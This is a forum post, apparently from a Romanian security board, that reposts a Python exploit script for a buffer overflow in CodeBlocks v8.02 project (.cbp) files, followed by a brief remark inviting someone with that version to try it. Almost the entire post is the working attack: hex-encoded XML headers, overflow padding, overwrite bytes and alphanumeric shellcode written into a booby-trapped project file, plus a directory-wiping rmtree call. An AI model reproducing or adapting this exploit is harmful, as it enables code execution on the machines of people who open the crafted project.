Jump to content
Nytro

CodeBlocks v8.02 (cbp) Buffer Overflow Exploit

Recommended Posts

Posted

CodeBlocks v8.02 (cbp) Buffer Overflow Exploit

#!/usr/bin/python



import sys,os,shutil



if len(sys.argv) != 3:

print "------------------------------------------------"
print "CodeBlocks (cbp) Buffer Overflow Exploit "
print "Usage : exploit.py <project_name> <path>"
print "Example : exploit.py sploit_proj c:\proj\\ "
print "By : sup3r "
print "------------------------------------------------"

sys.exit(0)



name = sys.argv[1]

path = sys.argv[2]



header1=(

"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20"

"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61"

"\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79\x65\x73\x22\x20\x3f\x3e\x0a\x3c\x43\x6f"

"\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65\x63\x74\x5f\x66\x69\x6c"

"\x65\x3e\x0a\x09\x3c\x46\x69\x6c\x65\x56\x65\x72\x73\x69\x6f\x6e\x20\x6d\x61\x6a"

"\x6f\x72\x3d\x22\x31\x22\x20\x6d\x69\x6e\x6f\x72\x3d\x22\x36\x22\x20\x2f\x3e\x0a"

"\x09\x3c\x50\x72\x6f\x6a\x65\x63\x74\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e"

"\x20\x74\x69\x74\x6c\x65\x3d\x22"+name+"\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x4f"

"\x70\x74\x69\x6f\x6e\x20\x70\x63\x68\x5f\x6d\x6f\x64\x65\x3d\x22\x32\x22\x20\x2f"

"\x3e\x0a\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72"

"\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x42\x75\x69\x6c\x64\x3e\x0a"

"\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c\x65\x3d\x22\x44\x65"

"\x62\x75\x67\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x75"

"\x74\x70\x75\x74\x3d\x22")



header2=(

"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x65\x78"

"\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f\x3d\x22\x31\x22\x20\x2f\x3e\x0a"

"\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x6f\x62\x6a\x65\x63\x74\x5f\x6f"

"\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x44\x65\x62\x75\x67\x5c\x22\x20\x2f"

"\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22"

"\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f"

"\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"

"\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64"

"\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x67\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"

"\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f\x54\x61\x72"

"\x67\x65\x74\x3e\x0a\x09\x09\x09\x3c\x54\x61\x72\x67\x65\x74\x20\x74\x69\x74\x6c"

"\x65\x3d\x22\x52\x65\x6c\x65\x61\x73\x65\x22\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70"

"\x74\x69\x6f\x6e\x20\x6f\x75\x74\x70\x75\x74\x3d\x22\x62\x69\x6e\x5c\x52\x65\x6c"

"\x65\x61\x73\x65\x5c"+name+"\x22\x20\x70\x72\x65\x66\x69\x78\x5f\x61\x75\x74"

"\x6f\x3d\x22\x31\x22\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x5f\x61\x75\x74\x6f"

"\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20"

"\x6f\x62\x6a\x65\x63\x74\x5f\x6f\x75\x74\x70\x75\x74\x3d\x22\x6f\x62\x6a\x5c\x52"

"\x65\x6c\x65\x61\x73\x65\x5c\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x4f\x70\x74"

"\x69\x6f\x6e\x20\x74\x79\x70\x65\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09"

"\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x3d\x22\x67\x63"

"\x63\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e"

"\x0a\x09\x09\x09\x09\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d"

"\x4f\x32\x22\x20\x2f\x3e\x0a\x09\x09\x09\x09\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65"

"\x72\x3e\x0a\x09\x09\x09\x09\x3c\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x09"

"\x09\x3c\x41\x64\x64\x20\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x73\x22\x20\x2f\x3e"

"\x0a\x09\x09\x09\x09\x3c\x2f\x4c\x69\x6e\x6b\x65\x72\x3e\x0a\x09\x09\x09\x3c\x2f"

"\x54\x61\x72\x67\x65\x74\x3e\x0a\x09\x09\x3c\x2f\x42\x75\x69\x6c\x64\x3e\x0a\x09"

"\x09\x3c\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x09\x3c\x41\x64\x64\x20"

"\x6f\x70\x74\x69\x6f\x6e\x3d\x22\x2d\x57\x61\x6c\x6c\x22\x20\x2f\x3e\x0a\x09\x09"

"\x3c\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x3e\x0a\x09\x09\x3c\x55\x6e\x69\x74\x20"

"\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x6d\x61\x69\x6e\x2e\x63\x22\x3e\x0a\x09"

"\x09\x09\x3c\x4f\x70\x74\x69\x6f\x6e\x20\x63\x6f\x6d\x70\x69\x6c\x65\x72\x56\x61"

"\x72\x3d\x22\x43\x43\x22\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x55\x6e\x69\x74\x3e\x0a"

"\x09\x09\x3c\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x09\x09\x3c\x63"

"\x6f\x64\x65\x5f\x63\x6f\x6d\x70\x6c\x65\x74\x69\x6f\x6e\x20\x2f\x3e\x0a\x09\x09"

"\x09\x3c\x64\x65\x62\x75\x67\x67\x65\x72\x20\x2f\x3e\x0a\x09\x09\x3c\x2f\x45\x78"

"\x74\x65\x6e\x73\x69\x6f\x6e\x73\x3e\x0a\x09\x3c\x2f\x50\x72\x6f\x6a\x65\x63\x74"

"\x3e\x0a\x3c\x2f\x43\x6f\x64\x65\x42\x6c\x6f\x63\x6b\x73\x5f\x70\x72\x6f\x6a\x65"

"\x63\x74\x5f\x66\x69\x6c\x65\x3e\x0a")



c_file=(

"#include <stdio.h>\n"

"#include <stdlib.h>\n\n"

"int main()\n"

"{\r\n"

" printf(\"Don't compile \");\n"

" return 0;\n"

"}\r\n")



#calc shellcode -> 375 bytes

shellcode=(

"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIvSkymS8iKnKizNkipta"

"4XtckmQ2SuCZMwgQQrVK3zKKL8bJTVqioWuCFZMR79Z4sN1mLEmqcz5WfLnimlbTOkz7YhM"

"TVLjgORFvCiZQgVcUvmQxo71MCmQS2ZJxVlK1kjLZuoZOrZvPC2EBRnxL28JWY9YTVLjdPP"

"f5KvjimNRTKSpompftKYZ47UVMNeMrrxiZtppx6MYMLvaCvrHjwvYqj2FV7rmKMOm6khlKM"

"OuUOMzCOQvNwl1T6xmwgKzUNZqQXRPMPNmaQo8Nnpnn77Jq6k5pilYJ4mNQojymXqwvyUFO"

"ytJPtq0vzNn7gw1CFtJA")



payload = header1

payload += "\x41"*(4072-len(path))

payload += "\x74\x06\x41\x41"

payload += "xp"

payload += "\x30\x71"

payload += "\x61"*169

payload += "\x41"*111

payload += shellcode

payload += "\x61"*(6720-len(shellcode))

payload += header2



try:

shutil.rmtree(path)

except os.error:

pass



try:

os.mkdir(path)

cbp = open(path+name+'.cbp', 'w')

cbp.write(payload)

cbp.close()

main = open(path+'main.c', 'w')

main.write(c_file)

raw_input("[x] Exploit project created!")



except:

print "Error!"

Sursa: CodeBlocks v8.02 (cbp) Buffer Overflow Exploit

Cred ca inca sunt multi utilizatori ai acelei versiuni. Eu am 10.05, are cineva 8.02 ca sa incerce?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...